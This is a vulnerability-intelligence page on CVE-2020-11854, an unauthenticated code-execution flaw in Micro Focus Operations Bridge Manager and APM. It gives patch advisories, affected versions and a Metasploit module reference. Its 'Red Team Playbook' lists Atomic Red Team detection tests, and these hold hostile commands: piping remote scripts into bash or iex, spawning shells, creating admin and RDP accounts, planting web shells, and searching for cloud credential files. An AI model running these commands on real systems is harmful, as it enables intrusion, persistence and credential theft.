CVE-2020-11854
Overview
This vulnerability is an arbitrary code execution flaw caused by improper handling of input within Micro Focus Operation Bridge Manager, Operations Bridge (containerized), and Application Performance Management components. The root cause lies in insecure processing of data that allows execution of unauthorized code without sufficient validation or restrictions. Multiple versions of these products are affected, exposing core management and monitoring features to exploitation.
Vulnerability Description
Arbitrary code execution vlnerability in Operation bridge Manager, Application Performance Management and Operations Bridge (containerized) vulnerability in Micro Focus products products Operation Bridge Manager, Operation Bridge (containerized) and Application Performance Management. The vulneravility affects: 1.) Operation Bridge Manager versions 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, 10.63,10.62, 10.61, 10.60, 10.12, 10.11, 10.10 and all earlier versions. 2.) Operations Bridge (containerized) 2020.05, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05. 2018.02 and 2017.11. 3.) Application Performance Management versions 9,51, 9.50 and 9.40 with uCMDB 10.33 CUP 3. The vulnerability could allow Arbitrary code execution.
Impact
An attacker with network access and no authentication can execute arbitrary code on affected Micro Focus products, leading to full system compromise. This enables unauthorized control over monitoring and management infrastructure, potentially disrupting business operations, exfiltrating sensitive data, or facilitating lateral movement within the enterprise environment. The vulnerability's CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms remote exploitation with low complexity and no user interaction required.
Solution
Micro Focus has released security advisories KM03747658, KM03747657, and KM03747854 detailing patches for Operation Bridge Manager, Operations Bridge (containerized), and Application Performance Management. Users should upgrade to the fixed versions specified in these advisories, including Operation Bridge Manager versions post-2020.05 and Application Performance Management versions beyond 9.51 with updated uCMDB. Refer to the vendor's official support pages for precise patching instructions and apply updates promptly to mitigate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in Micro Focus products, specifically within the Operation Bridge Manager, Operations Bridge (containerized), and Application Performance Management, is characterized by the potential for arbitrary code execution. This critical flaw arises from improper input validation mechanisms, allowing an attacker to execute arbitrary commands on the affected systems. The vulnerability affects multiple versions of these products, including various releases from 2017 through 2020, thereby increasing the risk exposure for organizations utilizing these tools for application performance management and operational oversight.
Exploitation of this vulnerability can occur through several attack vectors. An attacker could leverage network access to send crafted requests to the affected applications, triggering the execution of malicious code. This could be achieved through various means, such as phishing attacks that trick users into interacting with compromised interfaces or direct exploitation of unpatched systems. Once the attacker gains access, they can execute arbitrary commands, potentially leading to unauthorized data access, system manipulation, or even complete control over the affected infrastructure. The ease of exploitation, combined with the high privileges often associated with these management tools, amplifies the threat landscape significantly.
The real-world impact of this vulnerability is profound, especially for organizations that rely on these Micro Focus products for critical operations. The ability to execute arbitrary code can lead to severe business risks, including data breaches, service disruptions, and financial losses. Organizations may face regulatory penalties if sensitive data is compromised, and the reputational damage from such incidents can be long-lasting. Furthermore, the operational capabilities of affected organizations could be severely hampered, leading to downtime and loss of productivity. The high CVSS score of 9.8 underscores the urgency with which organizations must address this vulnerability to safeguard their assets and maintain operational integrity.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular vulnerability assessments and penetration testing can help identify unpatched systems and potential exploitation vectors. Organizations should prioritize updating their Micro Focus products to the latest versions that contain patches for this vulnerability. Additionally, employing intrusion detection systems (IDS) can assist in monitoring for unusual activity that may indicate an attempted exploitation. Implementing strict access controls and network segmentation can further reduce the attack surface, limiting the potential for unauthorized access to critical systems.
In conclusion, the arbitrary code execution vulnerability in Micro Focus products presents a significant threat to organizations utilizing these tools for application performance management and operational oversight. The potential for exploitation through various attack vectors, combined with the severe real-world impacts, necessitates immediate attention from cybersecurity professionals. By adopting proactive detection and mitigation strategies, organizations can better protect their systems and data from the risks posed by this vulnerability. The importance of maintaining up-to-date software and employing robust security measures cannot be overstated in the face of such critical vulnerabilities.
CSURFACE threat intelligence has identified a notable surge in detection activity related to CVE-2020-11854, indicating increased adversary interest and potential exploitation attempts targeting affected Micro Focus products. Although the overall exploit trend remains stable according to EPSS metrics, the qualitative rise in telemetry suggests that threat actors are actively probing or leveraging this vulnerability more frequently. The emergence of a Metasploit module capable of chaining multiple weaknesses to achieve unauthenticated remote code execution further amplifies the risk, expanding the attack surface across both Windows and Linux environments. This development underscores the heightened threat environment for organizations using Operation Bridge Manager, Application Performance Management, and their containerized variants. Consequently, the risk level for this vulnerability should be considered elevated, as the combination of increased reconnaissance activity and accessible exploit tools lowers the barrier for successful compromise.
Affected Products (23)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microfocus | Application Performance Management | 9.50 |
cpe:2.3:a:microfocus:application_performance_management:9.50:*:*:*:*:*:*:*
|
|
|
Microfocus | Application Performance Management | 9.51 |
cpe:2.3:a:microfocus:application_performance_management:9.51:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge | 2017.11 |
cpe:2.3:a:microfocus:operations_bridge:2017.11:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge | 2018.02 |
cpe:2.3:a:microfocus:operations_bridge:2018.02:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge | 2018.05 |
cpe:2.3:a:microfocus:operations_bridge:2018.05:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge | 2018.08 |
cpe:2.3:a:microfocus:operations_bridge:2018.08:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge | 2018.11 |
cpe:2.3:a:microfocus:operations_bridge:2018.11:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge | 2019.05 |
cpe:2.3:a:microfocus:operations_bridge:2019.05:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge | 2019.08 |
cpe:2.3:a:microfocus:operations_bridge:2019.08:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge | 2020.05 |
cpe:2.3:a:microfocus:operations_bridge:2020.05:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | All |
cpe:2.3:a:microfocus:operations_bridge_manager:*:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 10.11 |
cpe:2.3:a:microfocus:operations_bridge_manager:10.11:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 10.12 |
cpe:2.3:a:microfocus:operations_bridge_manager:10.12:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 10.60 |
cpe:2.3:a:microfocus:operations_bridge_manager:10.60:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 10.61 |
cpe:2.3:a:microfocus:operations_bridge_manager:10.61:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 10.62 |
cpe:2.3:a:microfocus:operations_bridge_manager:10.62:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 10.63 |
cpe:2.3:a:microfocus:operations_bridge_manager:10.63:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 2018.05 |
cpe:2.3:a:microfocus:operations_bridge_manager:2018.05:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 2018.11 |
cpe:2.3:a:microfocus:operations_bridge_manager:2018.11:*:*:*:*:*:*:*
|
|
|
Microfocus | Operations Bridge Manager | 2019.05 |
cpe:2.3:a:microfocus:operations_bridge_manager:2019.05:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Micro Focus UCMDB Java Deserialization Unauthenticated Remote Code Execution
exploits/multi/http/microfocus_ucmdb_unauth_deser
|
- | Unknown | - | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-70 | Try Common or Default Usernames and Passwords |
35%
|
Medium | High | |
| CAPEC-191 | Read Sensitive Constants Within an Executable |
34%
|
— | Low |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
net user #{guest_user} /active:yes
sudo sysadminctl -guestAccount on
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-11854 |
| softwaresupport.softwaregrp.com |
GitHub CVE
x_refsource_MISC
|
https://softwaresupport.softwaregrp.com/doc/KM03747658 |
| softwaresupport.softwaregrp.com |
GitHub CVE
x_refsource_MISC
|
https://softwaresupport.softwaregrp.com/doc/KM03747657 |
| softwaresupport.softwaregrp.com |
GitHub CVE
x_refsource_MISC
|
https://softwaresupport.softwaregrp.com/doc/KM03747854 |
| zerodayinitiative.com |
GitHub CVE
x_refsource_MISC
|
https://www.zerodayinitiative.com/advisories/ZDI-20-1287/ |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.html |